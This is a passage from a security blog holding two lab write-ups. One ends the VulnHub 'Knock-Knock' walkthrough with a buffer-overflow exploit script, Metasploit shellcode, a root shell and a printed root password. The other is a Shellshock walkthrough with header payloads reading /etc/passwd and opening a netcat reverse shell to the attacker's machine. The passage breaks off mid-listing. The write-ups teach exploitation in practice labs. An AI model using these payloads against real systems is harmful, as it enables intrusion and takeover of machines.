<p>Sweet, that could be potentially useful! It means that I should be able to encode my payload and then pass it in as an input and it should work! Yeah, not really&hellip; I actually won&rsquo;t be able to get my full payload (shellcode etc.) encrypted as I will need to write out of bounds, and the application will crash instead of giving me my output.</p>

<p>From the analysis I did, it was also impossible to just encrypt shellcode and append it to the end of actual payload as the decryption would be different. Ahhh, seems like the only option is to reverse engineer the encryption mechanism and implement my own, with bigger buffer, pass my exploit payload through it, encrypt it, and then passed the encrypted one into the <code>tfc</code> to exploit it. Seems like a lot of work&hellip; and I&rsquo;m not that strong with super detailed analysis of assembly (at least not yet!). Hmmmmm&hellip; what else can I do!</p>

<p>And then it hit me. A lot of useful, debugging information is in the dumped core files! How about if I&rsquo;ll just extract entire encoded input from dumped core, instead of reverse engineering the encryption? Sounds like a plan!</p>

<p>To allow cores being dumped we can just increase maximum size of core files created by running:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# ulimit -c unlimited</span></code></pre></td></tr></table></div></figure>


<p>But first, how do I know what exactly to extract? I will need to know offset of where to start and length of the input I need.</p>

<p>With trial and error (basically passing in input of varying lengths and checking value of return address in gdb), I was able to figure out how many bytes to pass in to overwrite the return address (4124 bytes).</p>

<p>Cool, now we need to know where to start.</p>

<p>Analysing encrypted output, I realised that the input with &ldquo;A&#8221;s always starts with the same bytes (as long as there&rsquo;s more than 4 &#8220;A&#8221;s - but that&rsquo;s the way the encrypting algorithm works - I did a simple analysis of it in IDA).</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# python -c 'print "A" * 100' &gt; in.tfc
</span><span class='line'>root@kali:~# ./tfc in.tfc out.tfc
</span><span class='line'>&gt;&gt; File crypted, goodbye!
</span><span class='line'>root@kali:~# xxd out.tfc | head
</span><span class='line'>0000000: def0 5bab 5df7 ab43 0690 fe64 6cb0 0b48  ..[.]..C...dl..H</span></code></pre></td></tr></table></div></figure>


<p>So, as long as there&rsquo;s only one occurence of <code>def0 5bab</code> in the core, we have all information we need. Let&rsquo;s check the core.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# python -c 'print "A" * 6000' &gt; in.tfc
</span><span class='line'>root@kali:~# ./tfc in.tfc out.tfc 
</span><span class='line'>Segmentation fault (core dumped)
</span><span class='line'>root@kali:~# xxd core | grep 'def0 5bab'
</span><span class='line'>0030700: def0 5bab 5df7 ab43 0690 fe64 6cb0 0b48  ..[.]..C...dl..H</span></code></pre></td></tr></table></div></figure>


<p>Awesome! Now we can craft our exploit and extract its encrypted version from the core.</p>

<p>But we need few more things for our exploit to make it work, address of a <code>jmp esp</code> instruction to overwrite return address with (to tell the program to jump to the top of the stack) and actual shellcode (we&rsquo;ll use metasploit payload generator).</p>

<p>To get <code>jmp esp</code> address, we&rsquo;ll use <code>msfelfscan</code>.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# msfelfscan -j esp tfc 
</span><span class='line'>[tfc]
</span><span class='line'>0x08048e93 jmp esp
</span><span class='line'>0x08048e93 jmp esp</span></code></pre></td></tr></table></div></figure>


<p>Sweet, the address doesn&rsquo;t have null bytes, so that makes it easier (otherwise it would probably messed up our exploit, as it would be treated as end of string).</p>

<p>Now the shellcode. We&rsquo;ll use metasploit to generate something that would suit our needs.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
<span class='line-number'>38</span>
<span class='line-number'>39</span>
<span class='line-number'>40</span>
<span class='line-number'>41</span>
<span class='line-number'>42</span>
<span class='line-number'>43</span>
<span class='line-number'>44</span>
<span class='line-number'>45</span>
<span class='line-number'>46</span>
<span class='line-number'>47</span>
<span class='line-number'>48</span>
<span class='line-number'>49</span>
<span class='line-number'>50</span>
<span class='line-number'>51</span>
<span class='line-number'>52</span>
<span class='line-number'>53</span>
<span class='line-number'>54</span>
<span class='line-number'>55</span>
<span class='line-number'>56</span>
<span class='line-number'>57</span>
<span class='line-number'>58</span>
<span class='line-number'>59</span>
<span class='line-number'>60</span>
<span class='line-number'>61</span>
<span class='line-number'>62</span>
<span class='line-number'>63</span>
<span class='line-number'>64</span>
<span class='line-number'>65</span>
<span class='line-number'>66</span>
<span class='line-number'>67</span>
<span class='line-number'>68</span>
<span class='line-number'>69</span>
<span class='line-number'>70</span>
<span class='line-number'>71</span>
<span class='line-number'>72</span>
<span class='line-number'>73</span>
<span class='line-number'>74</span>
<span class='line-number'>75</span>
<span class='line-number'>76</span>
<span class='line-number'>77</span>
<span class='line-number'>78</span>
<span class='line-number'>79</span>
<span class='line-number'>80</span>
<span class='line-number'>81</span>
<span class='line-number'>82</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/exploit# msfconsole
</span><span class='line'>
</span><span class='line'>IIIIII    dTb.dTb        _.---._
</span><span class='line'>  II     4'  v  'B   .'"".'/|\`.""'.
</span><span class='line'>  II     6.     .P  :  .' / | \ `.  :
</span><span class='line'>  II     'T;. .;P'  '.'  /  |  \  `.'
</span><span class='line'>  II      'T; ;P'    `. /   |   \ .'
</span><span class='line'>IIIIII     'YvP'       `-.__|__.-'
</span><span class='line'>
</span><span class='line'>I love shells --egypt
</span><span class='line'>
</span><span class='line'>
</span><span class='line'>Love leveraging credentials? Check out bruteforcing
</span><span class='line'>in Metasploit Pro -- learn more on http://rapid7.com/metasploit
</span><span class='line'>
</span><span class='line'>       =[ metasploit v4.10.0-2014100201 [core:4.10.0.pre.2014100201 api:1.0.0]]
</span><span class='line'>+ -- --=[ 1349 exploits - 742 auxiliary - 217 post        ]
</span><span class='line'>+ -- --=[ 340 payloads - 35 encoders - 8 nops             ]
</span><span class='line'>+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
</span><span class='line'>
</span><span class='line'>msf &gt; use payload/linux/x86/
</span><span class='line'>use payload/linux/x86/adduser
</span><span class='line'>use payload/linux/x86/chmod
</span><span class='line'>use payload/linux/x86/exec
</span><span class='line'>use payload/linux/x86/meterpreter/bind_ipv6_tcp
</span><span class='line'>use payload/linux/x86/meterpreter/bind_nonx_tcp
</span><span class='line'>use payload/linux/x86/meterpreter/bind_tcp
</span><span class='line'>use payload/linux/x86/meterpreter/find_tag
</span><span class='line'>use payload/linux/x86/meterpreter/reverse_ipv6_tcp
</span><span class='line'>use payload/linux/x86/meterpreter/reverse_nonx_tcp
</span><span class='line'>use payload/linux/x86/meterpreter/reverse_tcp
</span><span class='line'>use payload/linux/x86/metsvc_bind_tcp
</span><span class='line'>use payload/linux/x86/metsvc_reverse_tcp
</span><span class='line'>use payload/linux/x86/read_file
</span><span class='line'>use payload/linux/x86/shell/bind_ipv6_tcp
</span><span class='line'>use payload/linux/x86/shell/bind_nonx_tcp
</span><span class='line'>use payload/linux/x86/shell/bind_tcp
</span><span class='line'>use payload/linux/x86/shell/find_tag
</span><span class='line'>use payload/linux/x86/shell/reverse_ipv6_tcp
</span><span class='line'>use payload/linux/x86/shell/reverse_nonx_tcp
</span><span class='line'>use payload/linux/x86/shell/reverse_tcp
</span><span class='line'>use payload/linux/x86/shell_bind_ipv6_tcp
</span><span class='line'>use payload/linux/x86/shell_bind_tcp
</span><span class='line'>use payload/linux/x86/shell_bind_tcp_random_port
</span><span class='line'>use payload/linux/x86/shell_find_port
</span><span class='line'>use payload/linux/x86/shell_find_tag
</span><span class='line'>use payload/linux/x86/shell_reverse_tcp
</span><span class='line'>use payload/linux/x86/shell_reverse_tcp2
</span><span class='line'>msf &gt; use payload/linux/x86/exec 
</span><span class='line'>msf payload(exec) &gt; show options
</span><span class='line'>
</span><span class='line'>Module options (payload/linux/x86/exec):
</span><span class='line'>
</span><span class='line'>   Name  Current Setting  Required  Description
</span><span class='line'>   ----  ---------------  --------  -----------
</span><span class='line'>   CMD                    yes       The command string to execute
</span><span class='line'>
</span><span class='line'>msf payload(exec) &gt; set CMD /bin/sh
</span><span class='line'>CMD =&gt; /bin/sh
</span><span class='line'>msf payload(exec) &gt; show options
</span><span class='line'>
</span><span class='line'>Module options (payload/linux/x86/exec):
</span><span class='line'>
</span><span class='line'>   Name  Current Setting  Required  Description
</span><span class='line'>   ----  ---------------  --------  -----------
</span><span class='line'>   CMD   /bin/sh          yes       The command string to execute
</span><span class='line'>
</span><span class='line'>msf payload(exec) &gt; generate -b '\x00'
</span><span class='line'># linux/x86/exec - 70 bytes
</span><span class='line'># http://www.metasploit.com
</span><span class='line'># Encoder: x86/shikata_ga_nai
</span><span class='line'># VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
</span><span class='line'># PrependSetreuid=false, PrependSetuid=false, 
</span><span class='line'># PrependSetresgid=false, PrependSetregid=false, 
</span><span class='line'># PrependSetgid=false, PrependChrootBreak=false, 
</span><span class='line'># AppendExit=false, CMD=/bin/sh
</span><span class='line'>buf = 
</span><span class='line'>"\xdb\xd0\xbd\x79\xf6\x5f\x15\xd9\x74\x24\xf4\x58\x33\xc9" +
</span><span class='line'>"\xb1\x0b\x31\x68\x1a\x03\x68\x1a\x83\xc0\x04\xe2\x8c\x9c" +
</span><span class='line'>"\x54\x4d\xf7\x33\x0d\x05\x2a\xd7\x58\x32\x5c\x38\x28\xd5" +
</span><span class='line'>"\x9c\x2e\xe1\x47\xf5\xc0\x74\x64\x57\xf5\x8f\x6b\x57\x05" +
</span><span class='line'>"\xbf\x09\x3e\x6b\x90\xbe\xa8\x73\xb9\x13\xa1\x95\x88\x14"</span></code></pre></td></tr></table></div></figure>


<p>Bunch of shellcodes available for our target system, we&rsquo;ll use one that executes command, and the command will of course be <code>/bin/sh</code> :)</p>

<p>Also, generating payload with <code>-b</code> switch allows us to specify characters to blacklist. We don&rsquo;t want any null bytes in our shellcode, so we&rsquo;ll blacklist that.</p>

<p><em>EDIT: Thanks to <a href="https://twitter.com/TheColonial">TheColonial</a> for pointing this out - getting rid of NULL bytes is actually not required. NULL bytes are fine as we&rsquo;re reading from file and an entire file is read into memory!</em></p>

<p>Ok, now we have all we need. Let&rsquo;s have a look how our final exploit will look like.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="c">#/usr/bin/python</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Metasploit generated shellcode - 70 bytes</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">=</span> <span class="s">&quot;</span><span class="se">\xdb\xd0\xbd\x79\xf6\x5f\x15\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x0b\x31\x68\x1a\x03\x68\x1a\x83\xc0\x04\xe2\x8c\x9c\x54\x4d\xf7\x33\x0d\x05\x2a\xd7\x58\x32\x5c\x38\x28\xd5\x9c\x2e\xe1\x47\xf5\xc0\x74\x64\x57\xf5\x8f\x6b\x57\x05\xbf\x09\x3e\x6b\x90\xbe\xa8\x73\xb9\x13\xa1\x95\x88\x14</span><span class="s">&quot;</span>
</span><span class='line'>
</span><span class='line'><span class="n">content</span> <span class="o">=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="mi">4124</span>             <span class="c"># fill up the buffer</span>
</span><span class='line'><span class="n">content</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x93\x8e\x04\x08</span><span class="s">&quot;</span>    <span class="c"># overwrite return address with address of &#39;jmp esp&#39; instruction</span>
</span><span class='line'><span class="n">content</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x83\xec\x7f</span><span class="s">&quot;</span>        <span class="c"># instruction code for &#39;sub $esp, 175&#39; to make space on the stack for the shellcode (basically rewinding stack)</span>
</span><span class='line'><span class="n">content</span> <span class="o">+=</span> <span class="n">shellcode</span>             <span class="c"># our shellcode (70 bytes)</span>
</span><span class='line'><span class="n">content</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x90</span><span class="s">&quot;</span> <span class="o">*</span> <span class="mi">105</span>          <span class="c"># padding after the shellcode to ensure nothing immediatelly after the shellcode is executed as well and therefore corrupting our shellcode</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Print the exploit (we&#39;ll redirect output to file)</span>
</span><span class='line'><span class="k">print</span> <span class="n">content</span>
</span></code></pre></td></tr></table></div></figure>


<p>Alright, let&rsquo;s rock&#8217;n&#8217;roll, print exploit to file, run it through <code>tfc</code>, extract encrypted exploit from core, pass it in again and it should work!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# python exploit.py &gt; exploit.in.tfc
</span><span class='line'>root@kali:~# ./tfc exploit.in.tfc exploit.out.tfc
</span><span class='line'>Segmentation fault (core dumped)
</span><span class='line'>root@kali:~# xxd core | grep 'def0 5bab'
</span><span class='line'>002fe00: def0 5bab 5df7 ab43 0690 fe64 6cb0 0b48  ..[.]..C...dl..H</span></code></pre></td></tr></table></div></figure>


<p>Use <code>dd</code> to carve out what we need, byte by byte, skipping first 196096 bytes (002fe00 in hex - as above) and grabbing all 4306 bytes (total length of our exploit):</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# dd if=core of=exploit.out.tfc skip=196096 count=4306 bs=1
</span><span class='line'>4306+0 records in
</span><span class='line'>4306+0 records out
</span><span class='line'>4306 bytes (4.3 kB) copied, 0.017911 s, 240 kB/s
</span><span class='line'>root@kali:~# ./tfc exploit.out.tfc pwnd.tfc
</span><span class='line'># id
</span><span class='line'>uid=0(root) gid=0(root) groups=0(root)
</span><span class='line'># </span></code></pre></td></tr></table></div></figure>


<p>Woohooooo, so it works locally on our Kali! All we have left to do is copy our encrypted payload onto knock-knock and run it there.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# scp exploit.out.tfc jason@172.16.246.133:.
</span><span class='line'>jason@172.16.246.133's password: 
</span><span class='line'>exploit.out.tfc                               100% 4306     4.2KB/s   00:00    </span></code></pre></td></tr></table></div></figure>




<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>jason@knockknock:~$ ./tfc exploit.out.tfc pwned.tfc
</span><span class='line'># whoami
</span><span class='line'>root
</span><span class='line'># cd /root
</span><span class='line'># ls
</span><span class='line'>crpt.py  server.py  start.sh  the_flag_is_in_here
</span><span class='line'># cd the_flag_is_in_here
</span><span class='line'># ls
</span><span class='line'>qQcmDWKM5a6a3wyT.txt
</span><span class='line'># cat *    
</span><span class='line'> __                         __              __                         __      ____ 
</span><span class='line'>|  | __ ____   ____   ____ |  | __         |  | __ ____   ____   ____ |  | __ /_   |
</span><span class='line'>|  |/ //    \ /  _ \_/ ___\|  |/ /  ______ |  |/ //    \ /  _ \_/ ___\|  |/ /  |   |
</span><span class='line'>|    &lt;|   |  (  &lt;_&gt; )  \___|    &lt;  /_____/ |    &lt;|   |  (  &lt;_&gt; )  \___|    &lt;   |   |
</span><span class='line'>|__|_ \___|  /\____/ \___  &gt;__|_ \         |__|_ \___|  /\____/ \___  &gt;__|_ \  |___|
</span><span class='line'>     \/    \/            \/     \/              \/    \/            \/     \/       
</span><span class='line'>
</span><span class='line'>Hooray you got the flag!
</span><span class='line'>
</span><span class='line'>Hope you had as much fun r00ting this as I did making it!
</span><span class='line'>
</span><span class='line'>Feel free to hit me up in #vulnhub @ zer0w1re
</span><span class='line'>
</span><span class='line'>Gotta give a big shout out to c0ne, who helpped to make the tfc binary challenge,
</span><span class='line'>as well as rasta_mouse, and recrudesce for helping to find bugs and test the VM :)
</span><span class='line'>
</span><span class='line'>root password is "qVx4UJ*zcUdc9#3C$Q", but you should already have a shell, right? ;)
</span><span class='line'># </span></code></pre></td></tr></table></div></figure>


<h2>Summary</h2>

<p>Pretty awesome challenge! Really exercised my brain cells and I&rsquo;m glad I came up with a simple method of exploiting it without going into reverse engineering of the encryption mechanism.</p>

<p>I have actually started reversing it and got a fair bit into it, but then got this core dump idea and decided to write it up this way.</p>

<p>I saw other guys reverse engineered the encryption mechanism and got it working as well, I&rsquo;d recommend for you to go and check out what <a href="https://leonjza.github.io/blog/2014/10/14/knock-knock-whos-there-solving-knock-knock/">leonjza</a> and <a href="http://barrebas.github.io/blog/2014/10/14/knock-knock-knocking-on-roots-door/">barrebas</a> did!</p>

<p>Again, awesome challenge - big thanks to <a href="http://vulnhub.com">VulnHub</a> and <a href="https://twitter.com/zer0w1re">zer0w1re</a>!</p>
]]></content>
  </entry>
  
  <entry>
    <title type="html"><![CDATA[Basic Shellshock Exploitation]]></title>
    <link href="http://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/"/>
    <updated>2014-10-07T22:38:09+11:00</updated>
    <id>http://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation</id>
    <content type="html"><![CDATA[<p>Unless you were living under the rock for the last 2 weeks or so, you probably heard about a vulnerability in Bourne Again Shell (BASH), aka &ldquo;Shellshock&rdquo; (who comes up with those names?!) aka &ldquo;Bash bug&rdquo; aka &ldquo;OMG! Internet is coming to an end&rdquo; aka&hellip; you get the idea :)</p>

<p>Working in security field, I have heard about it a lot, maybe even too much in the last couple weeks and, after it has been publicly announced, I saw lots of failed exploitation attempts hitting Internet facing servers under my jurisdiction.</p>

<p>I have researched the vulnerability (<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271">CVE-2014-6271</a> and other flavours of it) a fair bit, saw heaps of malicious traffic, but actually never seen a successful exploit (well, that&rsquo;s a good thing I guess&hellip;) and never had a chance to play with it on an actual vulnerable machine.</p>

<p>And yet, here it comes <a href="http://vulnhub.com">vulnhub.com</a> again with a tiny VM created specifically for this purpose - to get your hands dirty with this particular vulnerability. So&hellip; let&rsquo;s get started, shall we?</p>

<!-- more -->


<h2>Shock that shell</h2>

<p>I&rsquo;ll omit the recon phase and just jump straight to the essence.</p>

<p>We have a simple VM running a web server on port 80, the site looks like this:</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-10-07-basic-shellshock-exploitation/main_page.png" title="Main Page" alt="Main Page" /></p>

<p>Let&rsquo;s look at the source. Immediatelly we see something interesting:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
</pre></td><td class='code'><pre><code class='js'><span class='line'><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span>
</span><span class='line'>    <span class="kd">function</span> <span class="nx">status</span><span class="p">()</span> <span class="p">{</span>
</span><span class='line'>        <span class="nx">$</span><span class="p">.</span><span class="nx">getJSON</span><span class="p">(</span><span class="s2">&quot;/cgi-bin/status&quot;</span><span class="p">,</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">data</span><span class="p">)</span> <span class="p">{</span>
</span><span class='line'>            <span class="nx">$</span><span class="p">.</span><span class="nx">each</span><span class="p">(</span> <span class="nx">data</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span> <span class="nx">key</span><span class="p">,</span> <span class="nx">val</span> <span class="p">)</span> <span class="p">{</span>
</span><span class='line'>                <span class="nx">$</span><span class="p">(</span><span class="s1">&#39;#infos&#39;</span><span class="p">).</span><span class="nx">append</span> <span class="p">(</span> <span class="s2">&quot;&lt;li&gt;&lt;b&gt;&quot;</span><span class="o">+</span><span class="nx">key</span><span class="o">+</span><span class="s2">&quot;&lt;/b&gt;: &quot;</span> <span class="o">+</span> <span class="nx">val</span> <span class="o">+</span> <span class="s2">&quot;&lt;/li&gt;&quot;</span> <span class="p">);</span>
</span><span class='line'>            <span class="p">});</span>
</span><span class='line'>        <span class="p">});</span>
</span><span class='line'>    <span class="p">}</span>
</span><span class='line'>    <span class="nx">status</span><span class="p">();</span>
</span><span class='line'><span class="o">&lt;</span><span class="err">/script&gt; </span>
</span></code></pre></td></tr></table></div></figure>


<p>We have a cgi script that runs system commands and displays them on a webpage - all conditions met for our Shellshock vulnerability!</p>

<p>All we need to do now is to exploit the vulnerability by providing a crafted shell command in one of the HTTP headers, that then will be processed by the webserver as an environment variable and, as a result, executed on the system.</p>

<p>Generally, the most common HTTP headers that I saw being targeted are:</p>

<ul>
<li>User-Agent</li>
<li>Host</li>
<li>Referer</li>
</ul>


<p>Let&rsquo;s try modifying User-Agent header. I&rsquo;ll be using Burp repeater as it should be the easiest to play around with and modify the request when needed.</p>

<p>Start up burpsuite:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# burpsuite</span></code></pre></td></tr></table></div></figure>


<p>And craft the HTTP request:</p>

<p><em>Note: make sure there are 2 empty lines at the end of your raw request in Burp, otherwise the request won&rsquo;t work!</em></p>

<p><img src="http://blog.knapsy.com/images/posts/2014-10-07-basic-shellshock-exploitation/burp.png" title="Burp" alt=" burp " /></p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>GET /cgi-bin/status HTTP/1.0
</span><span class='line'>user-agent: () { :; }; /bin/bash -c 'echo vulnerable!'</span></code></pre></td></tr></table></div></figure>


<p>Response:</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-10-07-basic-shellshock-exploitation/burp_fail.png" title="Burp fail response" alt=" Burp fail response " /></p>

<p>Hmm&hellip; no response displayed on the screen, neither in the headers (I saw some examples where echo came back in headers, I guess it&rsquo;s not the case in this instance).</p>

<p>Let&rsquo;s try some other commands:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>GET /cgi-bin/status HTTP/1.0
</span><span class='line'>user-agent: () { :; }; /bin/bash -c 'cat /etc/passwd'</span></code></pre></td></tr></table></div></figure>


<p>But again, the same error message and no output displayed back. Is it even working? Let&rsquo;s try to ping back our Kali.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>GET /cgi-bin/status HTTP/1.0
</span><span class='line'>user-agent: () { :; }; /bin/bash -c 'ping -c 3 172.16.246.129'</span></code></pre></td></tr></table></div></figure>


<p>Listening for ping:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# tcpdump -i eth0 -n icmp
</span><span class='line'>tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
</span><span class='line'>listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
</span><span class='line'>20:02:14.854659 IP 172.16.246.132 > 172.16.246.129: ICMP echo request, id 18947, seq 0, length 64
</span><span class='line'>20:02:14.854706 IP 172.16.246.129 > 172.16.246.132: ICMP echo reply, id 18947, seq 0, length 64
</span><span class='line'>20:02:15.856028 IP 172.16.246.132 > 172.16.246.129: ICMP echo request, id 18947, seq 1, length 64
</span><span class='line'>20:02:15.856050 IP 172.16.246.129 > 172.16.246.132: ICMP echo reply, id 18947, seq 1, length 64
</span><span class='line'>20:02:16.856425 IP 172.16.246.132 > 172.16.246.129: ICMP echo request, id 18947, seq 2, length 64
</span><span class='line'>20:02:16.856451 IP 172.16.246.129 > 172.16.246.132: ICMP echo reply, id 18947, seq 2, length 64</span></code></pre></td></tr></table></div></figure>


<p><img src="http://blog.knapsy.com/images/posts/2014-10-07-basic-shellshock-exploitation/burp_success.png" title="Burp success" alt=" Burp success " /></p>

<p>Aha! So it works and we&rsquo;re actually getting output displayed on the screen. How about chaining the commands then?</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>GET /cgi-bin/status HTTP/1.0
</span><span class='line'>user-agent: () { :; }; /bin/bash -c 'ping -c 3 172.16.246.129; id; cat /etc/passwd'</span></code></pre></td></tr></table></div></figure>


<p><img src="http://blog.knapsy.com/images/posts/2014-10-07-basic-shellshock-exploitation/burp_success_chain.png" title="Burp chain success" alt=" Burp chain success " /></p>

<p>As expected, all works fine! As you can see, we can do quite a lot of damage here. Let&rsquo;s get a shell (conviniently netcat is installed):</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>GET /cgi-bin/status HTTP/1.0
</span><span class='line'>user-agent: () { :; }; /bin/bash -c 'nc 172.16.246.129 31337 -e /bin/sh'</span></code></pre></td></tr></table></div></figure>


<p>Waiting for reverse shell:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# nc -lvp 31337
</span><span class='line'>listening on [any] 31337 ...
</span><span class='line'>172.16.246.132: inverse host lookup failed: Unknown server error : Connection timed out
</span><span class='line'>connect to [172.16.246.129] from (UNKNOWN) [172.16.246.132] 34190
</span><span class='line'>whoami
</span><span class='line'>pentesterlab
</span><span class='line'>id
</span><span class='line'>uid=1000(pentesterlab) gid=50(staff) groups=50(staff),100(pentesterlab)</span></code></pre></td></tr></table></div></figure>


<p>And we have a shell! Just like this&hellip; scary huh?</p>

<p>Since there was no particular goal in the challange (no flag or anything), let&rsquo;s just try to get a root and do more damage (just for fun and because&hellip; I always wanted to do it :P).</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
